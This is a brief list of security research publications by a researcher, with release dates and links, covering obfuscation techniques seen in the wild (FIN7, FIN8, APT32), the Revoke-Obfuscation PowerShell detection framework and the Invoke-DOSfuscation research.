Co-authored with Mandiant's Nick Carr (@ItsReallyNick).
This blog post highlights several incremental obfuscation techniques our team observed threat actors FIN7, FIN8 and APT32 using in the wild during the first half of 2017.
Release Date: 2017-06-30
Link: https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
Co-authored with Microsoft's Lee Holmes (@Lee_Holmes).
This blog post and white paper outline the research methodology and data science techniques that Lee and I applied as we developed the Revoke-Obfuscation framework, the first AST-based (Abstract Syntax Tree) PowerShell obfuscation detection framework which we released at Black Hat USA 2017 (video) and DEF CON 25 (video).
Release Date: 2017-07-27
Link: https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html
This blog post and white paper outline the research methodology and detection development approaches that I applied during the DOSfuscation research. This is the research and white paper that I released at Black Hat Asia 2018 (video) along with the Invoke-DOSfuscation framework.
Release Date: 2018-03-23